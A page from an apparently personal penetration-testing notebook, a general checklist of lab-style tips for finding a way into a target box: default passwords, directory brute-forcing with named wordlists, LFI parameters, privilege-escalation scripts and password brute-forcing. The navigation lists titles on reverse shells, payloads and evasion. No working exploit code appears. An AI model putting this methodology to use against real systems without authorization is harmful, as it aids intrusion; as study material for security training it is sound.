Hack$Notes
  • Hack$Notes
  • Enumeration
    • NMAP Scanning
    • Hping3 Scanning
      • IDLE SCAN
    • DNS Enum
    • SMB Enum
    • SMTP Enum
    • POP3
    • SNMP Enum
    • LDAP Enum
    • HTTP Enum
      • CheckList
    • FTP Enum
    • SSH Enum
    • MySQL Enum
    • Oracle Enum
    • NFS Enum
    • Internet Relay Chat (IRC)
    • Telnet
    • Kerberos
    • Finger
    • Ports Open/Close
    • ident
    • Postgresl
  • Transferring Files
  • Metasploit Framework
    • Msfvenom tutorial
    • Msfvenom Payloads
  • Reverse Shells
  • Buffer Overflow
    • B.O Steps
    • SLmail B.O
  • Spawning a Shell
  • Password Attacks
    • Passing the Hash
    • SAM/SYSTEM
    • Passwords
    • Hydra
    • Medusa
    • Ncrack
    • Unshadow
    • Hashcat
    • John The Ripper
    • fcrackzip
  • Privilege Escalation
    • Windows
      • Kernel Exploits
      • Stored Credentials
      • Unquoted Service Path
      • Always Install Elevated
      • Weak Permissions
      • Schedule Tasks
      • AutoRun Executables
      • Startup Apps
      • Passwords
      • Win PrivEsc Tools
    • Linux
      • Kernel Exploits
      • Service Exploits
      • PATH Variable
      • SUID/GUID files
      • CronJobs
      • Sudo
      • Custom Executable
      • Linux PrivEsc Tools
  • Port Forwarding
  • Tools / Techniques
    • General Check List
    • Misc. Commands
    • Steganography
    • Evasion Techniques
    • SQL Injection Payloads
    • LFI / RFI
    • Recover contents
    • JAR Files
    • Strace/Ltrace
    • Port Knocking
    • Screenshots in Kali
    • Curl
  • Resources
    • Books
    • Links
Powered by GitBook
On this page

Was this helpful?

  1. Tools / Techniques

General Check List

General Checklist

  • Check default passwords.

  • Check versions of services.

  • Try more than one file while directory brute-forcing (i.e. /usr/share/wordlists/dirb/big.txt, /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt, /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt)

  • Once inside a CMS or site check every single page.

  • bash vs sh. Try both when doing privesc. One does not mean the other.

  • SEARCH EVERYTHING.....even if it seems silly!!!! (i.e photos) Check even CSS files.

  • Check other exploits too if there are available. Do not stuck on one. It may say version 2.4 and the exploit with version 2.5 will work too.

  • Enumerate subdomains if you are getting nothing.

  • Check the /opt and /var directories.

  • Intercept traffic with BurpSuite if you are stuck.

  • If you believe there is no other way in (i.e. have found one), then just stick with it and search search search for it.

  • Run more than one privesc scripts (LinEnum, lse.sh, peas etc)

  • If you see http://10.10.10.10/index.php/ run gobuster/dirsearch against it. It may reveal a URL as http://10.10.10.10/index.php/admin/

  • Read the code. It is on the details what it needs to be done/change. Just read the code!!!

  • Try all of them shell_exec, system, exec to be sure.

  • If credentials are not working and you are sure it should, then revert the box. Might have crashed the box somehow along the way.

  • If you are 100% sure the exploit is the one you are looking and it is not working, try 64 bit or 32 bit. Depends the architecture of the box.

  • If there is a redirection to the page....after installing NoRedirect plugin on Firefox....add the page to NOT redirect it. Also intercept the traffic with BurpSuite to see where this goes.

  • Execute commands manually. Sometimes you miss it when running automate scripts.

  • Search and spend some time with LFI/URL parameters

  • Running out of ideas? Brute-Force may be the last option. (use different lists and not only rockyou.txt)

As a general rule:

One finding leads to the next. (e.g. found a file? this will lead you to the next step)

PreviousTools / TechniquesNextMisc. Commands

Last updated 4 years ago

Was this helpful?